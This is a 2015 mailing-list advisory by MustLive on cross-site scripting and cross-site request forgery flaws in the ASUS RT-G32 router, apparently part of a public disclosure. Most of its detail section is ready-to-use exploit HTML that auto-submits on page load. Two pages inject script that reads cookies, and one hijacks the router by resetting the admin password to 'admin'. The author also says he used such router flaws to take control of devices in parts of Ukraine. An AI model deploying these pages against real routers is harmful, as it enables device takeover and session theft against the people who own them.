ASUS RT-G32 XSS and CSRF vulnerabilities

2015.04.27
Credit: MustLive
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32. ------------------------- Affected products: ------------------------- Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2. Since Asus ignored vulnerabilities in their notebook, which I sent them in 2009, and previous vulnerabilities in RT-G32, which I sent them this year, so I publish these vulnerabilities publicly. ---------- Details: ---------- Cross-Site Scripting (WASC-08): ASUS RT-G32 XSS-2.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm"; method="post"> <input type="hidden" name="current_page" value="javascript:alert(document.cookie)"> </form> </body> </html> ASUS RT-G32 XSS-3.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm"; method="post"> <input type="hidden" name="next_page" value="javascript:alert(document.cookie)"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings of device. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-2.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm"; method="post"> <input type="hidden" name="sid_list" value="LANHostConfig%3BGeneral%3B"> <input type="hidden" name="group_id" value=""> <input type="hidden" name="modified" value="0"> <input type="hidden" name="action_mode" value="+Apply+"> <input type="hidden" name="wl_ssid2" value="Hacked"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="log_ipaddr" value=""> <input type="hidden" name="time_zone" value="MST-3MDT"> <input type="hidden" name="ntp_server0" value="pool.ntp.org"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk and Lugansks regions of Ukraine. Read about it in list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-April/009090.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7671/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://websecurity.com.ua/7671/


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